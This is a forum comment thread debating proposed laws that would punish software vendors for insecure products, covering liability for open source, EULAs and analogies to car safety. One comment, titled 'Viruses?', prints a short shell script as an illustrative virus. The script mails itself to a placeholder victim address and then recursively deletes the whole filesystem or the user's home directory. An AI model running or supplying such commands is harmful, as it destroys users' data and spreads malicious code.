Laws to Punish Insecure Software Vendors?
Gambit Thirty-Two writes "An influential body of researchers is calling on the US Government to draft laws that would punish software firms that do not do enough to make their products secure."
Yeah that'll work.
fgp (Score:2, Funny)
"How many people here believe in ghosts?" About 90 students raise their hands.
"Well that's a good start. Out of those of you who believe in ghosts, do any of you think you've ever seen a ghost?" About 40 students raise their hands.
"That's really good. I'm really glad you take this seriously. Has anyone here ever talked to a ghost?" 15 students raise their hands.
"That's a great response. Has anyone here ever touched a ghost?" 3 students raise their hands.
"That's fantastic. But let me ask you one question further... Have any of you ever made love to a ghost?"
One student in the back raises his hand. The professor is astonished. He takes off his glasses, takes a step back, and says,
"Son, all the years I've been giving this lecture, no one has ever claimed to have slept with a ghost. You've got to come up here and tell us about your experience."
The redneck student replies with a nod and begins to make his way up to the podium.
The professor says, "Well, tell us what it's like to have sex with a Ghost."
The student replies, "Ghost?!? I thought you said 'goats'."
open source (Score:5, Insightful)
Re:open source (Score:3, Insightful)
With open source you didn't pay, and it's a matter of trust between the user and the developer that the program is secure... and if you're really worried about it, you have access to the source.
Re:open source (Score:2, Interesting)
If Open Source developers have no liability, as you say, the business world will have a very difficult time embracing it.
OH PLEASE! (Score:2, Insightful)
That's ridiculous. How many times have you heard of a commercial company being held liable for crappy products? How many products have MS released that have NOT worked as advertised, yet required consumers to PAY to upgrade to a version that should have worked to begin with?
Besides that, all the software licenses (shrink wrap or no) basically say "we're not responsible".
Re:open source (Score:3, Interesting)
Re:open source (Score:3, Insightful)
These are companies that hire programmers, go through source code and make distros that people pay money for. I would consider them software firms that would fall under this proposal and I also consider them critical for the success of Open Source software.
Now what happens to these companies when some project they have little control over, but include in their distribution, has a critical flaw that gets exploited? How vulnerable to litigation do they become? Guess we'll have to wait and see.
Re:open source (Score:4, Insightful)
A critical point, I think. Keep in mind that these security holes are not exactly akin to a lock with a pink sticker that says "This lock doesn't actually work". A lot of research and experimentation is necessary in order to exploit those security holes - research and experimentation carried out by criminals. As much as I would love to see software companies held accountable for the generally terrible state of software quality industry-wide, I'm not sure it's fair to hold Microsoft responsible for making possible the actions of a malicious hacker. Is it Honda's fault a slimjim opens the door of my Civic?
A Certain Level (Score:5, Insightful)
> possible the actions of a malicious hacker. Is it Honda's fault a
> slimjim opens the door of my Civic?
Well, to get a realistic comparison, you'd need to compare on even ground. Pretend for a moment that your car door locks went to "locked" when you pushed the lock button, and "unlocked" when you pushed the unlock. However, they didn't actually engage the tumblers in the door, so when it's locked, the handle still opens the door. Now, there's a switch inside the door that you can get to by pulling the door side off, and when you throw it the tumblers connect and when the door says "locked" it now really means it.
Now, would you blame Honda if they didn't set the switch to "on" at the factory, and didn't tell anyone about the switch, and only acknowledged that it exists when someone in the field finds it and threatens to tell the general public?
I'd bet you would. That's a fairer comparison, and so yes, I think the companies that produce easily exploitable software should be forced to a reckoning for it.
Virg
Re:open source (Score:5, Insightful)
It does not have to be that way. Why not put in an exemption for software that comes with source code? The presumption could be that releasing source code allows the user to take responsibility for the correct operation of the software. Also consider that the OSS writer has little or no control over changes the user might make (and that's one of the main points, isn't it?)
Just like a LLP (Score:5, Interesting)
Who are we thinking about? (Score:3, Insightful)
Though the article mentions Microsoft because of their security record, I think that the drafters of the proposal are "thinking of" consumers, not the fortunes of any one company/group of developers. And, I believe it is the ethical duty of software developers, whether Open Source or proprietary, to think of the users of our software as well. Which is why, as I've said, if drafted correctly I'm not neccessarily opposed to such a law.
With regard to the specific example of IE: if IE has a security flaw that exemplifies gross negligence, then the fact that it's free won't mitigate liability. If the flaw is in an OS component (where much of the functionality previously offered in IE is now embodied), then it wasn't free, was it?
WRT the "seldom used" product: if the company charged money for it, and it had a security hole which caused actual damages to one of their customers, why shouldn't they be liable?
Re:MS will be sure it is (Score:2, Insightful)
Re:open source (Score:5, Insightful)
That's a bit like saying a car company shouldn't be held responsible for putting faulty brakes on a car, since after all, the car owner could have replaced the brakes with something that worked.
Re:open source (Score:2)
Re:open source (Score:5, Insightful)
It does not have to be that way. Why not put in an exemption for software that comes with source code? The presumption could be that releasing source code allows the user to take responsibility for the correct operation of the software. Also consider that the OSS writer has little or no control over changes the user might make (and that's one of the main points, isn't it?)
What needs to be made illegal are EULAs that absolve the software creator of guilt for flaws. Ford is liable for putting the wrong tires on SUVs and causing people to die. Ask Explorer owners (if you can talk to people that would buy one nowadays) how they would have reacted to such a license, and imagine how the courts would have reacted.
You've also made an excellent point about the futility of the GPL, but I digress.
Re:open source (Score:3, Insightful)
OSS companies/programmers will be just as liable as closed source ones.
It does not have to be that way. Why not put in an exemption for software that comes with source code? The presumption could be that releasing source code allows the user to take responsibility for the correct operation of the software. Also consider that the OSS writer has little or no control over changes the user might make (and that's one of the main points, isn't it?)
Furthermore, OS authors do not always have control over what versions of what libraries are being used, or for that matter, what compiler is being used. With source code, mileage *will* vary. With a complete binary only distribution, it's another matter.
Re:open source (Score:3, Informative)
Second of all, it wouldn't matter anyway. If I walk into a business suggesting they buy a warrantied product from a reputable manufacturer, and my competition walks in suggesting they use a free product with no warranty, I will win the contract.
I guarantee it.
Re:open source (Score:3, Insightful)
If a problem is found in unmodified code, the original creator of the code is not held liable because the end user community has the tools they need to fix it.
Re:open source (Score:2)
And how, exactly, is this a bad thing? Personally if RedHat got hauled into court due to their history of sloppiness, I'd be cheering.
But (Score:2)
Re:But (Score:2)
Re:open source (Score:3, Insightful)
But software that is free, free as in free beer, should carry no liability. I've always felt that if you provide something for free, and you don't force it into people's hands, those people should understand the risks of using it.
However, if you're making money off of it, that money should go toward making sure the software is stable and secure, and that people get what they pay for. In that case, I think certain reasonable guidelines on security and reliability could and should be backed by consumer protection laws. There are certain things that should simply be illegal, such as shipping software with vulnerable servers running by default. The way some software vendors ship products with 40 outside-facing services to a novice user who will never run ps aux or check the services control panel is, to me, an unnecessary, easily preventable, and easily pluggable hole, especially considering the number of people who use these systems and the value of the data that gets thrown on them.
Re:open source (Score:3, Informative)
gus.
Re:open source (Score:2)
links Open Src&liability proposals Re:open so (Score:3, Informative)
Open source developers face new warranty threat [theregister.co.uk]
Rosen and Kunze were attempting to secure an exemption from implied warranties of merchantability, fitness, or non-infringement for a computer program, "provided under a license that does not impose a license fee for the right to the source code, to make copies, to modify, and to distribute the computer program."
The proposal would have brought the rest of the States in line with Maryland.
The replacement version, which reads "or to distribute...", is joined by a provision that nullifies the exception for software licensed to consumers.
The complete text can be found here [nccusl.org]....
(a) Except as provided in subsection (b), the warranties under Sections 401 and 403 do not apply to a computer program if the licensor makes a copy of the program available to the licensee in a transaction in which there is no contract fee for the right to use, make copies of, modify, or distribute copies of the program.
(b) Subsection (a) does not apply if the copy of the computer program is contained in and sold or leased as part of goods or if the transaction is with a consumer licensee that is not a software developer.
Easy Money (Score:2, Insightful)
So this means that if I configure my computer without a password, I can sue the manufacturer for defective security in their software if it gets hacked.... Cool
</SARCASM>
Re:Easy Money (Score:3, Funny)
Zero chance of success... (Score:2)
This is aimed at Microsoft, George Bush's friends in Redmond. It asks them and others to actually produce secure and reliable software, and makes them responsible for their actions.
It sounds ridiculous that this isn't already covered by things like consumer protection, but in fact those licenses make sure that vendors have no responsibilities. And no one is going to change that in the US while there is a president who doesn't even want to prosecute the biggest violator of security concerns out there for monopolistic practices.
Re:Zero chance of success... (Score:2, Interesting)
I have administered WindowsNT 4 and Windows 2000 systems. I have *NEVER* been cracked, hacked, or otherwise seen any ill effects from the security flaws that do exist in any of the Microsoft products we use on our server platforms.
I have written WSH scripts that automatically update and spread any updates to all of my systems. All I have to do is approve the update, which is done after I test it. I stay on top of their security patches and simply followed their recommended guidelines for locking down a server. I also disabled several things I know are exploitable.
The funny thing is, I end up doing the same thing with the latest and greatest from RedHat. They make it a little easier out of the box to keep up with the updates etc. I have to turn off services I don't want and follow the "common sense" guide of things like turning off services I don't need.
I am not saying my boxes are uncrackable, or that I am all knowing, or even that great at securing systems.... Anyways.
Re:Zero chance of success... (Score:2)
So what are you saying?
Re:Zero chance of success... (Score:2)
Wouldn't that be called a scaregiraffe?
Hard to implement (Score:2, Insightful)
How to track liability (Score:4, Insightful)
For instance, am I liable if I use the standard C function gets() in a program? I, as the program vendor, can argue that that's what was taught in my undergrad CS course, or I could point the finger at the language designer or C library vendor.
What about a program I write that communicates w/ other software via a standard protocol, and works perfectly if the other software adheres strictly to that protocol but fails in combination with another program which implemented that protocol incorrectly; am I to blame, or is the other vendor? What if the spec is vague?
As I've said in other posts, the potential for good legislation along these lines is there, but only with *heavy* involvement of people who understand issues such as these, alongside the industry lobbyists, consumer advocates and politicians.
Join the Libertarian Party (Score:3, Informative)
Re:Join the Libertarian Party (Score:2)
Join the Green Party. (Score:2)
Be careful what powers you let corporations have when you let them run amok without government regulation.
Yes, please do (Score:2)
Such as special dispensations to ignore normal contract law by selling "licenses", such as copyright, such as patent...
*Real* libertarians aren't as one sided as you seem to be. They actually believe in fewer laws of any kind, not just fewer of the kind favorable to their favorite soapbox.
car safety (Score:3, Interesting)
But then there's the impaired drunk drivers (not to trivialize the 0.08 crowd, but I'm far more worried about Bubba with a 0.24 BAC than the 0.08 crowd). They tend to take out other people as well. When they drive impaired, they're a threat to all of us. I don't think we should ban alcohol, but I don't see a problem with the state having the right to crack down on repeat drunk drivers, because there are documented cases of some drunk drivers who have been in multiple accidents resulting in death.
Taking it one step further, I remember being poor and in college and resenting the mandatory vehicle checks my state required. Then I moved to a state that didn't have mandatory vehicle checks... and heard some horror stories of what those vehicle inspections found in other states. Again, I don't give a damn if some moron wants to jack up his pickup with ice hockey pucks... until he takes it on the road and they suddenly shear, forcing his vehicle to roll/tumble into my oncoming traffic lane.
Now let's revisit the software issue. Once again, I really don't give a damn what people do on their own systems that are not attached to the net. But I do care when I can't use my cable modem because NIMDA a NIMDA stupid NIMDA coding NIMDA bug NIMDA NIMDA left NIMDA many NIMDA NIMDA NIMDA systems NIMDA NIMDA open NIMDA NIMDA NIMDA NIMDA NIMDA.
The Libertarians have a point when they argue that the state should rarely, if ever, protect an individual from themselves. And that the state should rarely, if ever, protect people from inconsequential behavior of their neighbors. (You don't like the fact that your neighbors are gay? It's your problem, not theirs, unless they're doing stuff that would be a problem regardless of their sexual orientation.)
But once you get into behavior that demonstrably harms others, or could reasonably result in harm to others, it's a whole new game. Unfortunately far too many Libertarians don't get this.
In this particular case, we need to see the proposals. But there is absolutely no way you can argue that Microsoft's sloppy practices have not harmed many innocent people. If it takes a law to force them to accept that their indifference demonstrably harms others, so be it.
Terrorism (Score:2, Interesting)
Everyone would be in violation (Score:5, Interesting)
Re:Everyone would be in violation (Score:2)
The linux kids might be happy about MS getting hit for $10K or whatever per IIS hole, but when the same thing starts happening to proFTPd, BIND, sendmail, etc... the shat will really start hitting the fan!
If such a law does get passed, it will certainly be ruled unenforceable the first time it's tested in court.
Re:Everyone would be in violation (Score:3, Insightful)
Re:Everyone would be in violation (Score:3, Interesting)
In case of, say, Microsoft, the problem is not necessarily that they don't (try to) fix the known problems, it's that they somehow managed not to realize the obvious potential problems (with email/documents allowing active fully enabled scripting) when designing products in the first place.
Re:Everyone would be in violation (Score:2)
#include <iostream>

int main()
{
    std::cout << "Hello, World";
    return 1;
}
as far as I know, the root hole was fixed in 0.2.3
Re:Everyone would be in violation (Score:5, Insightful)
Fine them? (Score:3, Funny)
Re:Fine them? (Score:2)
Send check or cases of beer to my home address listed below...
Oh my, the irony (Score:4, Insightful)
It's always interesting when those who call for freedom and security for themselves can only figure out how to do it by reducing the freedom of others. Now they want to legislate software standards? Come on, you have to be against that.
Re:Oh my, the irony (Score:2)
That being said, the goal (having some recourse against foolishly ignorant s/w companies) could be more easily reached by simply abolishing EULAs and letting legal action proceed based on the actual damages products cause (if any). I know the administration doesn't really have power over the courts (and shouldn't), but they should be able to test EULAs in court.
So... (Score:2)
emmm... (Score:2, Interesting)
Lobbying against it? (Score:2, Interesting)
Freedom of Speech (Score:4, Insightful)
An additional question would be: should all software now come with a warranty that specifically disclaims the implied warranty and states that there is no warranty? Would that be legal under the proposal?
Re:Freedom of Speech (Score:4, Interesting)
Do you have the right of freedom of speech to utter other potentially hazardous comments? Yelling "FIRE!" in the middle of a crowded theatre is dangerous, and illegal. If you're engineering a bridge, does "freedom of speech" give you the right to design it so that it will collapse when people try to use it?
There is a wide legal history for freedom of speech ending when it causes harm to others.
Re:Freedom of Speech (Score:5, Insightful)
You don't need to open that whole can of worms at all, in this case. The right to say something does not equate to the right to sell it - unless it is sold for the purpose of communication (which commercial software is not.)
People who write software and then sit on it, or only give it to a few friends, cannot and should not be able to be held accountable for their software not working - unless (like yelling "FIRE!" in the middle of a crowded theatre) there is clear evidence of malicious intent (computer viruses.)
Someone who distributes software for free ought to be required to disclaim any warranties, which they already do, and that is fine.
On the other hand, when you sell a piece of software there is an implied warranty of merchantability that you cannot disclaim. Extending that warranty to include security is not a free speech issue. Your right to write any code you want is still protected; you just cannot necessarily sell it.
By extension, however, code written for the purpose of communication - including "here is how you write DeCSS" or the example code in a CS textbook - would still be protected, and you'd still have a right to sell it, whether or not it worked or was secure.
Re:Freedom of Speech (Score:2)
But, if you have been reading some of the latest decisions in the courts, software also has a functional aspect that can be litigated. Once you package that program into a binary and start selling it, the issue is less about the code being free speech and more about the executable being a product.
Be careful of what you wish for (Score:4, Insightful)
Seems to me this will have the least impact on those who need to pay attention to security the most (large software companies), while having the potential to make it harder for the "little guy" to write and publish software.
What about the click-thru EULA? (Score:3, Informative)
There's always a clause saying that anything bad that happens while using the product is not their fault.
Now IANAL, but I thought that by clicking I Agree, you were actually agreeing to that.
Boon to Corporate America (Score:5, Insightful)
Another good move for corporate America.
Microsoft is able to defend itself against the government. Are you?
Re:Boon to Corporate America (Score:2)
It would also result in far less software being produced for businesses (large and small), since it would increase the cost of software so much. This would be a disaster for everyone.
Other Microsoft Failings... (Score:5, Funny)
For example Microsoft Bob.
I've been waiting for a service pack for it for years. I'm just not as comfortable hooking Bob up to the internet as I once was. Bob has gotten more viral infections than an old French Whore in a port town.
-Rothfuss
What product are we talking about? (Score:2)
What, legally require things like DRM?
No, I know what it means. Who's going to check out all this software? Are we going to have a Federal Department of Bug-Finding, which employs 57,000 people trying to write Code Red 3?
How will this result in anything other than higher prices and no change in the "security" of software?
I was right! (Score:2)
I agree (Sort of...) (Score:3, Informative)
Ford and GM shouldn't be allowed to produce cars that kill people, simply because they couldn't be bothered to make them safer - like exploding gas tanks - ok, so that's not such a great example... (grin)
But really, put the responsibility where it lies. If I put a system out on the net and don't take some steps to make it secure, I should be liable for damages it causes when it's compromised. Same for SW companies. If a company produces a product that doesn't meet the "reasonable man" test for care in producing it, the maker should be liable for negligence.
I might go even further though, and add some criminal penalties too.
Software can be more reliable, bug-free and secure. (Go read "The Software Conspiracy".) Sure it will cost more, but think what all the virus outbreaks cost businesses and individuals. It's just a hidden tax. MS (and others) are simply shifting the burden of producing software that works onto the users. It's cheaper for MS to produce the software, but lots more expensive for the users to use it.
Finally, the legal system _IS_ part of the free market. The threat and actual award of damages to a plaintiff balance the market - it's not just buyers and sellers in a wild, woolly mess.
It just bugs me when "free market" proponents proclaim that the courts are unnecessary in the free market - bull! They are important, and the market will not function correctly without them!
Isn't this a bit extreme? What if I WANT insecure? (Score:2)
I think a much better approach would be if companies had their software certified as secure. Just an independent group to come in and audit the release at varying levels of bulletproofedness.
It'd drive up software costs, but if consumers don't care to look for the "Certified Secure!" brand, why should the government force it?
Why not pass a law against crashes (Score:2, Insightful)
If they do this correctly... (Score:2)
If the USA Patriot Act could get passed after 9/11, so could this. Let's not forget that rationale goes the way of the buffalo in the months following an attack. And while I think a lot of software would be better than it is now if it were more secure, this wouldn't just affect MS.
Let's hope nothing comes of this, as it could mean lawsuits against anybody and everybody if any piece of data becomes available to the wrong party.
good concept (Score:3, Insightful)
A better solution is to allow people to sue software companies that produce software that does not do what it is supposed to do. For example, if Microsoft says they have the most secure servers on the market, those servers damn well better be secure.
As soon as a few lawsuits are filed, things will change for the better. There's too much being "protected" by microsoft software for them to continue business-as-usual for long if they get sued for every nimda/code red/etc out there doing damage.
However, if the company puts out patches (such as through windowsupdate) and the user fails to apply them in a timely manner, it's the user that screwed the pooch, not the producer.
effect on OpenSource? (Score:2)
There is a long history of laws (e.g., Sherman Act) designed to limit corporations but instead limit individuals.
Another reason to punish M$ (Score:2)
Re:Another reason to punish M$ (Score:2)
But it's not. Which suggests that it isn't actually better. Remember, "better" is relative, and what you look for may not be what someone else looks for in a product.
Wouldn't this give hackers more power? (Score:2, Interesting)
Yes, people already do this, but to bring in the Gov't to be manipulated by these whims seems silly. Be responsible for your own security.
Not Like Automobile Testing (Score:2)
Translating this to the software world, frankly, makes my head explode just thinking about it.
I can see, perhaps, a public standards body to which software vendors could choose to submit their products. In this scheme the government could award some kind of 'certification label' that a vendor could use on their packaging, etc., indicating it's 'safe'. That would at least let the marketplace decide the importance of government certification. However, we'd still be left with the niggly questions of what 'safe' is and how we might determine 'safeness'. Maybe this is akin to 'quality' certification along the lines of ISO9001/2 processes(??).
Re: (Score:2)
I'll settle for basic product liability (Score:2)
I'm willing to accept that it may have defects that may cause problems, but the defects in the software should be fixable by the vendor.
I'm not willing to accept that the product has so many defects that it does not do what is claimed. I call that fraud.
Oh what fun... (Score:2)
This is bad news for anyone dabbling in software development. You make a piece of software that does something (in your opinion) useful and release it on your website, where a few dozen people download it. It spreads a bit further, and suddenly someone somewhere does something that provokes your app to crash, or to be used in a nasty way, taking out their box and the other boxes on that network.
Now you suddenly find yourself with a fresh lawsuit in your mail claiming you're responsible for the couple hundred thousand dollars worth of damage done to a company in some remote place you've never heard of...
This sounds like an excellent way to deter anyone from ever releasing anything that's not tested and tested again, meaning development for a hobby will be a lot tougher.
I see a suggestion like this working only where a developer has clearly stated and guaranteed that his software will not in any way harm the user's equipment, or in cases of very gross neglect by the developer, such as failing to provide even rudimentary security.
BBC (Score:2)
If organizations want higher security, they won't buy the insecure products. Business that have been burned by Outlook/IIS/Windows in the past will move to alternatives: GroupWise/Apache/*NIX.
Barking up the wrong tree... (Score:2)
What I do want is to KNOW when a supposedly secure product has a security leak. Moreover, I want to know the ramifications of the issue, the patch progress, and the current known viruses/worms/other exploits roaming around.
I really don't want to sue company X for making insecure software -- but I don't like the idea of them holding back on vulnerability announcements once they've been exploited.
Re:Barking up the wrong tree... (Score:2)
This would just be a hindrance to making more secure software. We need something more like a "right to know" law.
Don't Use Insecure Products (Score:2)
I do think companies like Microsoft need to take more responsibility for the huge gaping security holes in their products, but I'm not sure legislation is the right way to go about it. I do think consumers need to be better informed. When Ford recalls a few vehicles over some potential safety hazard, it's all over the evening news. But what about when a dangerous security hole is found in the world's most used operating system? The vast majority of users never even know about it.
Complicating the issue here (Score:2)
If we bought cars with the same lack of discernment with which we buy software, Chevrolet could bring back the Corvair.
Hackers (Score:2)
Before we decide this is such a great idea . . . (Score:5, Insightful)
Mixed Emotions (Score:2)
I hear a lot of people happy about the idea of going after M$ because they are the Evil Empire. I also hear a lot of people that are afraid of us open sourcers being attacked. Obviously, more secure and better written code should be standard.
I'm not so sure that liability isn't a good thing. I'm not saying that a programmer should be completely responsible for his/her code and any results that occur. I can instead think of a different situation. Imagine I produce a piece of software and sell it/give it away. I don't think it's a bad idea for me to be required to meet some minimum obligations.
Now, of course end users will be responsible for installing patches, monitoring CERT advisories, etc. The end users are also responsible for attempting to avoid known bugs while waiting for a patch to become available. But, sometimes this isn't avoidable (think power generation system). If this particular bug is the cause, then by all means I think the users should be able to go after the company they PAID for damages. It's not like the software company didn't charge the end users to use the software. With those software rights, there really should be some sort of software liability (just like if I made a defective car, and then had to do a recall).
Absolutely no way (Score:2, Interesting)
BETA SOFTWARE
Well of course that has bugs. So we exempt this? OK, then all (Microsoft) software will be beta.
NEWBIE / EDUCATIONAL
Some newbie developer or uni student writes a piece of toy software and makes it available on his home page to boost his ego. Some other newbie academic downloads it and a bug in the "file manager" software deletes his C: drive.
Exempt educational software??
FREE BEER
Some people make software out of the goodness of their heart. "YMMV, maybe you like it, maybe you don't. No warranty." Maybe it is superb. But it might have a horrendous bug. So people will no longer release freeware.
OPEN SOURCE
Same as above, but with the source open, people can deliberately find bugs and cry out. Worse, there is plenty of open source software in commercial use (Apache etc.). What if some new iteration of Apache has a security hole? (And this will happen.) Can people sue for this? Can people sue the developers who worked on it for free? What exemption do you want now?
MICROSOFT
Well, by now, OSS has dried up because everyone is too scared to give work away. Maybe top projects that have been so heavily scrutinised in the past might be OK (Apache, the Linux kernel). Microsoft might last a little longer than expected thanks to security through obscurity, but of course they too will perish.
The end of software =)
Some more cool laws: (Score:2)
1. The Crap Film and Television Act will hold film-makers responsible for bad productions, bad acting, bad lighting and poor scripts. If someone passes out from boredom while watching a film, they can sue the studio.
2. The Invasive Pop-up Advertising Act will ban all pop-up adverts. This will tie in with the software laws, because pop-ups are technically software, and are insecure (in that they cause damage to my mouse).
3. The Insecure Boy-Band Act will ensure that all boy-bands are securely locked up. If a record company tries to bring them to a studio or gig, it will be punished.
compromised paper clip? (Score:2)
Are they serious? Can Clippy spread a virus? I never heard of that.
Ahhhh he's coming out of the computer....
- adam
What makes software secure? (Score:2, Interesting)
How does the OSS world make its software so secure? Through peer review. People find bugs and report them. With OSS these bugs are found fast. And these bugs get fixed fast. But what would be ludicrous would be to sue for bugs since at V1.0.0 there are bound to be bugs. Suing would kill the project. Peer review has made OSS strong and that is the way it should be.
Viruses? (Score:2)
I'm no fan of Microsoft, but it seems to me that it is the user's fault if they contract a virus. It all comes back to the knowledge level of the user.
If someone sent me:
#!/bin/sh
# Propagate: mail a copy of this script to the next victim
mail next@victim < "$0"
# Destroy: wipe the whole system if running as root, otherwise just the home dir
if [ "$UID" = "0" ]; then
    rm -rf /
else
    rm -rf ~
fi
And I executed it, it would be entirely my fault! Now can I sue every single UNIX (and UNIX-like) vendor because their system allowed me to delete my files "unknowingly"? Most of the Outlook viruses out there were really nothing more than that! In most cases, the user had to manually open the attachment and run it.
Notice that basically every single complaint about Microsoft's insecurity is due to ease-of-use features. Outlook executes attachments because it's much easier for users to click on an attachment to run it. The web server exploits targeted extra services Microsoft added to make things easier for people who wanted those features. And our good pal Clippy is, again, another ease-of-use feature. If people were more knowledgeable about computers there would be no need for these extra features, and so there would be less code that has to be verified as safe, not to mention more time to verify the important code.
While software security is important, knowledgeable users are just as important, if not more so.
White Hats (Score:4, Informative)
Lawyers would start to be accused of Bugtraq chasing.
The report (Score:3, Informative)
Well, just in case you haven't read it, the draft report is available for online perusal here [nap.edu]
PS I said NAS, not NSA. Just to be clear.
DMCA would nullify this! (Score:3, Insightful)
Um, yeah, that makes sense.
Legislation vs. Certification (Score:4, Interesting)
There are already market forces in place: insurers charge higher premiums to cover companies using software with a bad track record. Include that difference in premiums in the TCO calculations Microsoft is so fond of using to prove that Windows is cheaper than any competitor, and make management aware of it (and make them wonder why the insurance company wants higher premiums to insure against damages from security holes in that software).
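To make that concrete, here's a toy back-of-the-envelope comparison. All the numbers are hypothetical, invented purely to show how a per-seat breach-insurance premium could tip a TCO calculation between two otherwise similar products:

```shell
#!/bin/sh
# Hypothetical per-seat figures; only the insurance premiums differ.
SEATS=1000
LICENSE=300     # per-seat license cost
SUPPORT=100     # per-seat annual support
PREMIUM_A=50    # insurer's premium for product A (good security track record)
PREMIUM_B=120   # insurer's premium for product B (bad security track record)

TCO_A=$(( SEATS * (LICENSE + SUPPORT + PREMIUM_A) ))
TCO_B=$(( SEATS * (LICENSE + SUPPORT + PREMIUM_B) ))
echo "Product A TCO: \$$TCO_A"   # $450000
echo "Product B TCO: \$$TCO_B"   # $520000
```

The premium alone swings the total by $70,000 a year here, which is exactly the kind of line item management would notice.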
Legislation could hurt many a small software maker, and it would also be subject to heavy lobbying from Microsoft to see to it that their interests are hurt the least. A better idea would be an independent (that's the hard part) organisation providing certification of software. Once that is established, there could be legislation demanding minimum standards for software used in certain critical areas.
That way each software maker could choose how much to invest in security and QA, and it would be more transparent to customers how secure a product really is, so they wouldn't have to rely on the software maker's advertising for that kind of information. In effect, the insurance conditions and premiums for different kinds of software are already an indicator of their security, and the insurance companies have a strong interest in accurately estimating the risks, so they should probably play some part in ensuring the proposed organisation's independence.
False Advertisement / Work as Advertised (Score:3, Insightful)
Second, if any laws are written, my guess is they would merely extend already-existing, more generic laws regarding false advertising. Under such circumstances, software vendors would not be *required by law* to produce secure software. But if their advertising campaign, sales representatives, or software packaging blatantly leads potential consumers to believe that their product is "enterprise-level", "mission-critical-caliber", "secure", "reliable", or any such wording which implies "secure software", then the law could provide for serious compensation to the harmed consumer.
To avoid endless legal battles over wording, the government should designate an entity whose role would be to design, draft and maintain a *very specific* scale of security levels that defines strong standards for security features within software packages. The scale could provide not only very precise security requirements for software, but also standard types of compensation to the consumer for failure to meet each level's requirements.
Such a scale should be massively advertised through all media so consumers would know to look for a software package's rating on the scale before purchasing it for any mission-critical purpose.
We could let software vendors rate their own packages according to this scale. If the scale is *specific enough* and clearly defines levels of security, then consumers should have very strong cases to bring as class-action lawsuits to seek compensation in case such software fails to meet all of the requirements defined by its advertised grade on the scale.
Such a model would keep the government's involvement minimal and place all of the liability on the software vendor, so consumers never have to seek compensation from some government-sanctioned entity that assigns ratings to software packages. We must keep in mind that computer software is by nature a highly volatile, constantly evolving, and rarely flawless type of product, as every new piece of software written is by nature "cutting-edge".
Unsafe at any speed (Score:5, Interesting)
It took legislation to make cars safe. The auto companies hated it. They fought every inch of the way. But it made the auto industry grow up and make their products really work, no matter what.
Every major industry goes through this transition, where society insists that the technology work safely. Railroads did. Steam boilers did. Autos did. Civil engineering did. Electric power did. It's time for computing to do it.
It's time for the software industry to grow up and stop hiding behind one-sided licensing agreements. Software is too important in modern life to be as crappy as it is.
Buggy Code == Fraud (Score:3, Insightful)
There should be criminal and civil penalties for withholding information about security risks. Right now I do not have the legal right to know about security risks that are discovered in systems I use; the creators of those systems are not legally required to inform me when a new risk is discovered. This means that I cannot make an informed decision about how to protect myself from the problem. I can't even use a list of currently unresolved risks to help me decide which systems to use and/or purchase.
To me, the withholding of security risk information is a form of fraud. It is the same as rolling back the odometer on a used car. It is the same as selling Pintos with exploding gas tanks, and the same as selling flammable pajamas to children.

Companies must be required to release security risk information about their systems in a timely manner. They must be legally liable for damages that result from security issues between the time they discover a problem and the time they warn users about it. These kinds of penalties will force companies to create secure systems in the first place, and to warn people in a timely manner so that they can take action to protect themselves. Although it is tempting, I don't think developers should be required to fix the system. But a list of all outstanding security problems must be included in advertising and on the packaging of any system. People have to be able to make an informed decision about which systems to use.

We put warning labels on beer and cigarettes, we require people to wear seat belts, we require the disclosure of the ingredients of all our food, we have lemon laws to protect us from unscrupulous car salesmen, and we have product liability laws that cover every physical thing we purchase. But we have no equivalent legal protection from the purveyors of software snake oil.
The only way a company should be able to get out from under these penalties is to declare the product "dead" and notify all customers of record that no more security support will be given for it. Declaring the software dead should also require that the source code and/or system designs, as well as any patents and copyrights on the system, be released to the customers so that they can arrange for other sources of security support. At that point the company would not be allowed to sell, distribute, or accept any sort of payment, including royalties and support payments, for the software.
Stonewolf
This is not as far out as it first seems. (Score:3, Insightful)
Consider, say, the hotel I was at years ago... they had an indoor pool. Before you used the pool, you had to sign a waiver... they had a stack of them in the pool room.
The waiver basically said using the pool was at your own risk, etc, etc.
Now... Dad asked his lawyer later, for kicks.
Say you drowned because you couldn't swim.. and they had no lifeguard. This document would protect them... it was fairly clear there was no lifeguard.
But.. say the diving board was in disrepair, and broke off while you were about to dive, causing you to fall and break your leg... guess what? That contract doesn't absolve them of responsibility. Why? Because... it was reasonable to expect that the diving board worked.. the owner still had a duty to keep the area safe for its users, regardless of their waiver. (If they wanted a waiver to protect them against that, they would have to clearly state the risks.. state that the facilities are in bad repair and broken.)
Now.. software, we have these horrible EULAs... but still. I can understand how it's okay for a company to, say, protect itself from being sued over some little bug.. of COURSE they have to. Like.. say Excel crashes while you are in the middle of some work.. and you have to re-do it, so you are late for a meeting, so you lose the deal, etc.
Just as in the real world, where even a disclaimer can't generally release you of all obligation, so should it be with software. I don't know what the wording would be, or what would be fair... but software vendors should have a certain level of accountability for what they do.
Now.. how does this affect OSS? I don't know. Do I think OSS authors should be responsible for what they do? Yes, to a degree.. but there is a problem.. I don't think someone should be sued just because they shared some code with the world and it didn't work.
Unlike most, I read the report (Score:4, Informative)
It certainly does not claim that Microsoft is responsible for most security issues. If it had I would have expected Butler Lampson to have resigned from the board. It is not usual for NAS reports to target particular companies. It is not likely that David Clark would attack Butler in that way given that they are both LCS computing profs.
The statement about Microsoft is actually introduced from other sources, but in such a way that the casual reader assumes it was a recommendation from the report. The only occurrence of the string 'Microsoft' in the text is Butler's accreditation.
Likewise, I find it hard to find any recommendations. The majority of the report is simply a post-9/11 rehash of three previous reports by the same board. The nearest the report comes to suggesting legislation is:
Consider legislative responses to the failure of existing incentives to cause the market to respond adequately to the security challenge. Possible options include steps that would increase the exposure of software and system vendors and system operators to liability for system breaches and mandated reporting of security breaches that could threaten critical societal functions
That is quite a way from endorsing legislation, which is hardly surprising given the makeup of the panel.
Re:Bad Idea (Score:5, Insightful)
The Ford Pinto.
We have laws that tell auto manufacturers how they can build cars. Not in detail, no, but they have to meet certain standards or they just aren't legal to make. Note that business concerns don't enter into it. Making the Ford Pinto the way they did originally was a good business decision. It really did cost Ford less to pay out the death claims than to improve the car. It even arguably benefited the consumers, because lower costs to Ford meant a lower price on the car, and consumers were still buying them even after the problem became public, so people obviously wanted them. The courts still held Ford liable for building a car that blew up and killed people when they could easily have built one that didn't.
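For the curious, the figures commonly attributed to Ford's internal cost-benefit memo work out roughly like this. Treat the numbers as illustrative rather than gospel; the memo itself concerned fuel-system fires across the whole model line, and the exact figures vary by retelling:

```shell
#!/bin/sh
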